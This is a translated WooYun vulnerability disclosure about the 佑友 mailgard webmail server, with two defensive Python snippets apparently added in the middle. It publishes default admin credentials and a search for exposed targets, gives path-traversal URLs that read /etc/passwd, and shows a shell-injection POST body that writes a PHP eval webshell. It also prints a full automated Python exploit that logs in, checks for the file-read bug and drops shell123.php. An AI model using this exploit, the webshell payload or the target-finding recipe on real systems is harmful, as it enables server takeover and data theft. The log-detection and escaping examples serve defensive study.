Vulnerability summary

Defect ID: WooYun-2015-97649

Title: Youyou (佑友) mailgard webmail mail server getshell 0day, with Python exploit

Vendor: 佑友

Author: f4ckbaidu

Submitted: 2015-02-19 18:14

Published: 2015-05-29 17:18

Vulnerability type:

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: arbitrary file read, directory traversal

Vulnerability details

Disclosure status:

2015-02-19: details sent to the vendor, awaiting the vendor's response
2015-02-28: vendor confirmed; details disclosed to the vendor only
2015-03-03: details opened to third-party security partners (NSFOCUS (绿盟科技), 唐朝安全巡航, 无声信息
2015-04-24: details disclosed to core white hats and relevant domain experts
2015-05-04: details disclosed to regular white hats
2015-05-14: details disclosed to intern white hats
2015-05-29: details disclosed to the public

Brief description:

One more submission before the Spring Festival; can I get a lightning award for it?

Detailed description:

1. Arbitrary file download (login required)

Search Baidu for intitle:"mailgard webmail". Many installations that never changed the admin password are affected; the default credentials are admin/hicomadmin.

http://**.**.**.**/src/read_file.php?signature=../../../../../../../etc/passwd

http://**.**.**.**/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd

Reading the lighttpd error.log through this vulnerability reveals the web root: /var/www/newmail/
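The two read_file.php requests above leave an unmistakable trace in lighttpd's access log. The following script is an added example, not part of the original report and not code from the mailgard product: it runs over a few constructed log lines in lighttpd's default accesslog format and flags requests to src/read_file.php whose signature or uploadimage parameter resolves to a parent-directory or absolute path, decoding repeatedly so that single- and double-percent-encoded variants are caught as well. Hostnames, client addresses and timestamps in the sample are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in lighttpd's default accesslog format
# (%h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"); hosts,
# addresses and timestamps are invented, not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 mail.example.test - [19/Feb/2015:18:14:01 +0800] "GET /src/read_file.php?signature=../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.5 mail.example.test - [19/Feb/2015:18:14:02 +0800] "GET /src/read_file.php?uploadimage=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.7 mail.example.test - [19/Feb/2015:18:15:10 +0800] "GET /src/read_file.php?uploadimage=avatars%2Falice.png HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
10.0.0.9 mail.example.test - [19/Feb/2015:18:16:00 +0800] "GET /src/read_file.php?signature=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.7 mail.example.test - [19/Feb/2015:18:17:00 +0800] "GET /index.php HTTP/1.1" 200 910 "-" "Mozilla/5.0"
"""

# %h %V %u %t "%r" %>s ...  where %r is "METHOD URI PROTOCOL"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

WATCHED_SCRIPT = '/src/read_file.php'
WATCHED_PARAMS = ('signature', 'uploadimage')


def normalize(value, rounds=3):
    """Percent-decode until stable (bounded), so %2e%2e and %252e%252e both
    surface as '..', and treat backslashes as path separators."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace('\\', '/')


def is_traversal(value):
    """True if the value climbs out of its directory or names an absolute path."""
    path = normalize(value)
    return '..' in path.split('/') or path.startswith('/')


def find_traversal(log_text):
    """Return one record per request to read_file.php whose signature or
    uploadimage parameter is a traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('uri'))
        if parts.path != WATCHED_SCRIPT:
            continue
        # parse_qsl removes one layer of percent-encoding; normalize() does the rest
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key in WATCHED_PARAMS and is_traversal(value):
                hits.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'param': key,
                    'value': normalize(value),
                    'status': int(m.group('status')),
                })
    return hits


if __name__ == '__main__':
    for hit in find_traversal(SAMPLE_LOG):
        print('%(time)s %(ip)s %(param)s=%(value)s -> HTTP %(status)d' % hit)
```

Run on a real log by passing its contents to find_traversal(). A 200 status with a body size matching /etc/passwd is the strongest signal; a 404 or an empty body on the same request still shows that someone probed the parameter. Because the bug needs a valid session, joining each hit to the login that produced the cookie tells you which account (often the unchanged admin/hicomadmin) was used.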

1.png

2. System command execution leading to getshell

Downloaded the source for code review and found a command execution vulnerability.

/var/www/newmail/src/ajaxserver.php, starting at line 1789:

Code:
if($_GET['exec'] == 'recall'){ // recall a sent mail
    $user = str_replace('\\','\\\\',$_POST['user']);
    $messageid = str_replace('\\','\\\\',$_POST['messageid']);
    system(HM_SHELL."Mail_recall.sh '".$user."' '".$messageid."' '".$onlineip."' >null &");
    unset($_SESSION['H_MAILS']['Sent']);echo 'ok';exit;
}



The programmer is a moron: that str_replace outright wrecks the protection of magic_quotes_gpc and addslashes (the system has its own global filter, copied from Discuz), which leads to getshell:
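Why the str_replace undoes the global filter, and what correct escaping looks like, as an added example (this is neither the vendor's code nor the report author's exploit). addslashes turns a single quote into \'; the vendor then doubles every backslash, so \' becomes \\'. Inside a single-quoted shell argument a backslash is literal, so the quote now closes the argument early and everything after it is parsed as shell syntax. PHP's escapeshellarg() closes and reopens the quote instead; Python's shlex.quote() does the same and is used here to show the difference. The payload value is constructed inline with the same shape as the report's POST body, but with a harmless command.

```python
import shlex


def addslashes(value):
    """Model of PHP addslashes() / magic_quotes_gpc: a backslash is put in
    front of every single quote, double quote, backslash and NUL byte."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append('\\' + ch)
        elif ch == '\x00':
            out.append('\\0')
        else:
            out.append(ch)
    return ''.join(out)


def vendor_argument(value):
    r"""The chain from ajaxserver.php: the global addslashes() filter runs
    first, then str_replace('\\', '\\\\') doubles every backslash, and the
    result is wrapped in single quotes inside the system() string."""
    doubled = addslashes(value).replace('\\', '\\\\')
    return "'" + doubled + "'"


def hardened_argument(value):
    """shlex.quote() is the Python counterpart of PHP's escapeshellarg():
    the value is single-quoted and every embedded single quote is emitted as
    close-quote, double-quoted quote, reopen-quote, so it can never
    terminate the argument."""
    return shlex.quote(value)


def stays_one_argument(quoted):
    """Tokenize the quoted text the way a POSIX shell would. A correctly
    escaped value must come back as exactly one word; an unbalanced quote
    (shlex raises ValueError) is treated as a failure as well."""
    try:
        words = shlex.split(quoted, comments=True)
    except ValueError:
        return False
    return len(words) == 1


# Constructed input with the same shape as the report's POST body
# (quote, pipe, command, comment marker); the command itself is harmless.
PAYLOAD = "1'|echo injected #"

if __name__ == '__main__':
    for label, arg in (('vendor chain', vendor_argument(PAYLOAD)),
                       ('escapeshellarg-style', hardened_argument(PAYLOAD))):
        print('%-22s %-36r one argument: %s' % (label, arg, stays_one_argument(arg)))
```

For the PHP side the equivalent fix is to pass $_POST['user'] and $_POST['messageid'] through escapeshellarg() (after the global filter has been reversed with stripslashes, otherwise the backslashes end up in the data), or better, to validate messageid against a strict pattern and not go through a shell at all.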

The EXP is as follows; it drops a webshell at http://**.**.**.**/shell.php with password 123

Code:
http://**.**.**.**/src/ajaxserver.php?exec=recall
POST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1



2.png

Automated exploit:

Usage: python fuck.py http://**.**.**.**:80/ <account> <password>

Code:
import requests
import sys


if len(sys.argv) < 4:
    print 'usage:python fuck.py http(s)://target:port/ <username> <password>'
    print 'example:python fuck.py http://**.**.**.**:80/ admin admin'
    sys.exit(0)
else:
    target = sys.argv[1]
    if not target.endswith('/'):
        target += '/'
    username = sys.argv[2]
    password = sys.argv[3]
    sessionid = ''


def login(target,username,password):
    login_request = ''
    global sessionid
    domain = target[(target.index('.')+1):(target.index(':',6))]
    print 'domain=' + domain
    login_url = target + 'index.php'
    post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'
    try:
        login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)
        if login_request.status_code == 302:
            print 'login succeeded'
            sessionid = login_request.cookies['PHPSESSID']
            return sessionid
        else:
            print 'login failed,please check username and password'
            return False
    except Exception,e:
        print Exception,":",e
        return False


def check(target,sessionid):
    check_request = ''
    url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'
    request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
    try:
        check_request = requests.get(url,headers=request_header,verify=False,timeout=3)
        if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:
            print 'target is vulnerable\r\n'
            # print 'the content of file \'/etc/passwd\'\r\n'
            # print check_request.text
            return True
        else:
            print 'target is not vulnerable'
            return False
    except Exception,e:
        print Exception,":",e
        return False


def getshell(target,sessionid):
    getshell_request = ''
    fuckurl = target + 'src/ajaxserver.php?exec=recall'
    getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
    getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'
    # print getshell_data
    try:
        getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)
        if (requests.get(target + 'shell123.php',verify=False).status_code == 200):
            print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'
        else:
            print 'getshell failed!'
    except Exception,e:
        print Exception,":",e
        return False


if __name__ == '__main__':
    if (login(target,username,password)):
        print 'sessionid=' + sessionid
        if(check(target,sessionid)):
            print 'target is vulnerable to directory transversal'
        else:
            print 'target is not vulnerable to directory transversal'
        print 'trying to getshell,please wait'
        getshell(target,sessionid)

exp_usage.png

Proof of vulnerability:

Search Baidu for intitle:"mailgard webmail". Many installations that never changed the admin password are affected; the default credentials are admin/hicomadmin.

example1.png

example2.png

example3.png

Fix recommendation:

i don't know

Copyright notice: please credit f4ckbaidu@WooYun (乌云) when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-02-28 17:16

Vendor reply:

CNVD confirms the described vulnerability; no direct handling channel with the software vendor has been established yet, pending claim.

Latest status:

None



  1. 2015-02-19 15:19 | f4ckbaidu ( regular white hat | Rank:243 vulns:31 | development really is a dog's life)

    The exploit has a small problem: the URL must include the port number.

  2. 2015-05-29 17:24 | sql小神 ( intern white hat | Rank:56 vulns:13 | some vulns you can submit, some you can't.)

    @f4ckbaidu looks like you're about to get famous
